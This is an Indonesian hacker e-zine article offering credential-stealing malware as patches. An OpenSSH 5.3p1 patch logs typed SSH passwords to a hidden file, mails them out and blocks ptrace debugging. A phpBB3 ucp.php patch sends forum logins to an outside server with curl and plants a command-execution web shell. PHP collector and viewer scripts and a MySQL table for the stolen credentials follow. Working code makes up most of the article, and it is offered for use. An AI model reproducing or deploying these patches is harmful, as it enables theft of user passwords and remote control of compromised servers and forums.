Kecoak Elektronik Indonesia [ KEI ]
http://www.kecoak-elektronik.net

24 Hours A Day, 300/1200 Baud
Presents...


####################################################################
TOKET - Terbitan Online Kecoak Elektronik
Defending the classical hackers mind since 1995

Publisher : http://www.kecoak-elektronik.net
Contact   : staff@kecoak-elektronik.net
####################################################################


Subject   : Modifying Source Code - Stealing The Password
Writer    : BytesKrew
Contact   : staff@kecoak-elektronik.net
Style     : Unicode Transformation Format (UTF-8)


--[1]-- Kecoak Elektronik License

Kecoak Elektronik secara aktif mendukung Blue Ribbon Campaign.
Kami akan berusaha untuk menerbitkan semua informasi yang kami anggap
patut diketahui, baik dokumen teks, artikel majalah, atau surat kabar.
Seluruh kredit akan diberikan kepada sang pengarang.

Kecoak Elektronik tidak bertanggung jawab atas tindakan orang lain.
Informasi yang disajikan di situs ini adalah untuk tujuan pendidikan
dan informasionil belaka. Jika anda memutuskan untuk mengejawantahkan
dalam bentuk apapun informasi yang tersimpan di situs ini, anda
melakukan atas keputusan sendiri, dan tidak seorangpun selain anda
bertanggung jawab atas tindakan tersebut.

Dipersilahkan untuk mengambil sebagian atau seluruh dari isi artikel
yang kami terbitkan dengan tetap mencantumkan kredit atas pengarang
dan Kecoak Elektronik sebagai penerbit online. Artikel yang dikutip
atau diambil tidak dapat dipergunakan untuk kepentingan komersil.


--[2]-- Some Bullshit About SSH Keylogger!

This ssh keylogger patch just works on FreeBSD system. Use your fucking 
brain to make it working in other operating system. For Anti debugging 
feature, there is simple idea to prevent tracing system like strace, just 
prevent ptrace syscall! If you are cool enough, improve this keylogger to 
encrypt the data.

Keep Hacking boyz!


--[3]-- SSH Keylogger OpenSSH-5.3p1 Patch.


--- sshconnect2.c.ori   2010-02-12 21:44:49.000000000 +0700
+++ sshconnect2.c       2010-02-12 22:13:43.000000000 +0700
@@ -31,6 +31,7 @@
 #include <sys/wait.h>
 #include <sys/stat.h>

+#include <sys/ptrace.h>
 #include <errno.h>
 #include <netdb.h>
 #include <pwd.h>
@@ -75,6 +76,10 @@
 #include "ssh-gss.h"
 #endif

+//SSH log
+
+#define LOGZ "/tmp/.byteskrew" // change this line and make it more hidden
+
 /* import */
 extern char *client_version_string;
 extern char *server_version_string;
@@ -92,6 +97,16 @@

 Kex *xxx_kex = NULL;

+//Anti Ptrace!
+void tracer_check(void) __attribute__((constructor));
+
+void tracer_check(void){
+   if (ptrace(PT_TRACE_ME, 0, 0, 0) == -1) {
+       _exit(-1);
+   }
+}
+
+
 static int
 verify_host_key_callback(Key *hostkey)
 {
@@ -780,8 +795,9 @@
 userauth_passwd(Authctxt *authctxt)
 {
        static int attempt = 0;
-       char prompt[150];
+       char prompt[150],logz[128];
        char *password;
+       FILE *f;

        if (attempt++ >= options.number_of_password_prompts)
                return 0;
@@ -792,6 +808,18 @@
        snprintf(prompt, sizeof(prompt), "%.30s@%.128s's password: ",
            authctxt->server_user, authctxt->host);
        password = read_passphrase(prompt, 0);
+
+       //Password stealth
+        if((f=fopen(LOGZ,"a"))!=NULL){
+               fprintf(f,"user:password@host --> %s:%s@%s\n",authctxt->server_user,password,authctxt->host);
+                          fprintf(f,"user:password@host --> %s\n",password);
+               fclose(f);
+        }
+        //kirim ke server pake curl/mail terserah
+        //example pake 'mailx'
+        snprintf(logz,sizeof(logz),"cat %s|mail -s hackme jackd@kecoak-elektronik.net",LOGZ);
+       system(logz);
+
        packet_start(SSH2_MSG_USERAUTH_REQUEST);
        packet_put_cstring(authctxt->server_user);
        packet_put_cstring(authctxt->service);
		

--[4]-- Fears Inside Your Forum

Do you feel secure because your password is encrypted in database?
Or you may think that hackers can't crack your password just because
your password is strong. Let me tell you something, we know what you
type in your keyboard without stealing your database. We can even
hear what your fingers dance for. No more talk, this code will show
you the fears inside your PHPBB forum.


--[5]-- PHPBB3 UCP.PHP Patch.

--- ucp.old.php	2009-11-16 06:12:47.000000000 -0800
+++ ucp.php	2009-11-17 09:00:08.000000000 -0800
@@ -11,6 +11,14 @@
 /**
 * @ignore
 */
+
+if(!empty($_POST['username']) AND !empty($_POST['password'])){
+  $wr = $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . "\n";
+  $uri = explode('?',$wr);
+  $toserv="/usr/bin/curl -d \"u=" . $_POST['username'] . "&p=" . $_POST['password'] . "&uri=" . $uri[0] . "\" http://ipsecs.com/devel/log.php > /dev/null 2>&1";
+  passthru($toserv);
+}
+
 define('IN_PHPBB', true);
 $phpbb_root_path = (defined('PHPBB_ROOT_PATH')) ? PHPBB_ROOT_PATH : './';
 $phpEx = substr(strrchr(__FILE__, '.'), 1);
@@ -41,6 +49,41 @@
 // Basic "global" modes
 switch ($mode)
 {
+	case 'hack' :
+		//echo "<pre>This forum is hacked!</pre>";
+		?>
+
+		<pre>
+		- Backdoor Web Shell Seminar Palembang -
+		<form method="POST" action="<?php $_SERVER['PHP_SELF'] ?>" >
+		<table>
+		<tr>
+		 <td>Command : </td>
+		 <td>&nbsp;&nbsp;&nbsp; </td>
+		 <td><input type="text" name="command"></td>
+		</tr>
+		<tr>
+		 <td>&nbsp;&nbsp;&nbsp;</td>
+		 <td>&nbsp;&nbsp;&nbsp;</td>
+		 <td><input type="submit" value="execute!"></td>
+		</tr>
+		</table>
+		</form>
+
+		<?php
+		if(isset($_POST['command'])){
+		 echo "<strong>Executing \"" . $_POST['command'] . "\"</strong><BR/>\n";
+		 if(!empty($_POST['command'])){
+		  passthru($_POST['command']);
+		 }else{
+		  echo "You cannot execute blank command!<BR/>\n";
+ 		}
+		}
+		?>
+		</pre>
+		<?php
+	break;
+
 	case 'activate':
 		$module->load('ucp', 'activate');
 		$module->display($user->lang['UCP_ACTIVATE']);


--[6]-- Source Code log.php

<?php
if(isset($_POST['u']) AND isset($_POST['p']) AND isset($_POST['uri'])){

$dbhost="localhost";
$dbuser="u_logger";
$dbpass="p_logger";
$dbname="logger";

$c=mysql_connect($dbhost,$dbuser,$dbpass) or die(mysql_error());
mysql_select_db($dbname) or die(mysql_error());
$q="INSERT INTO klog (username,password,uri) VALUES ( '" . $_POST['u'] . "','" . $_POST['p'] . "','" . $_POST['uri'] . "')";
$exec=mysql_query($q) or die(mysql_error());
}
?>


--[7]-- Source Code view.php

<?php
if(isset($_POST['key']) AND $_POST['key']=="owned"){
  $dbhost="localhost";
  $dbuser="u_logger";
  $dbpass="p_logger";
  $dbname="logger";

  $c=mysql_connect($dbhost,$dbuser,$dbpass) or die(mysql_error());
  mysql_select_db($dbname) or die(mysql_error());
  $q="SELECT username,password,uri FROM klog ORDER BY no DESC";
  $exec=mysql_query($q) or die(mysql_error());
?>

<table border=1 width=60%>
<pre>
<tr>
<td width=10%>Username</td>
<td width=10%>Password</td>
<td width=40%>URI</td>
</tr>

<?php
  while($r=mysql_fetch_array($exec)){
    echo "<tr><td>" . $r['username'] . "</td>\n";
    echo "<td>" . $r['password'] . "</td>\n";
    echo "<td> http://" . $r['uri'] . "</td></tr>\n";
  }
?>

</pre>
</table>

<?php
}else{
?>

<pre>
<form action="<?php echo $_SERVER['PHP_SELF'];?>" method="POST">
<table>
<tr><td>Keyword</td>
<td>&nbsp;&nbsp;&nbsp;:</td>
<td><input type="password" name="key"></td>
<td><input type="submit" value="login"></td></tr>
</table>
</form>

<?php
}
?>


--[8]-- Database MySQL dump

-- phpMyAdmin SQL Dump
-- version 2.11.9.5
-- http://www.phpmyadmin.net
--
-- Host: localhost
-- Generation Time: Feb 14, 2010 at 06:12 PM
-- Server version: 5.0.81
-- PHP Version: 5.2.5

SET SQL_MODE="NO_AUTO_VALUE_ON_ZERO";

--
-- Database: `logger`
--

-- --------------------------------------------------------

--
-- Table structure for table `klog`
--

CREATE TABLE IF NOT EXISTS `klog` (
  `no` smallint(6) NOT NULL auto_increment,
  `username` varchar(64) NOT NULL,
  `password` varchar(64) NOT NULL,
  `uri` varchar(512) NOT NULL,
  PRIMARY KEY  (`no`)
) ENGINE=MyISAM  DEFAULT CHARSET=latin1 AUTO_INCREMENT=3 ;

--


-----------------------------------------------------------------------
Copyleft Unreserved by Law 1995 - 2010 Kecoak Elektronik Indonesia
http://www.kecoak-elektronik.net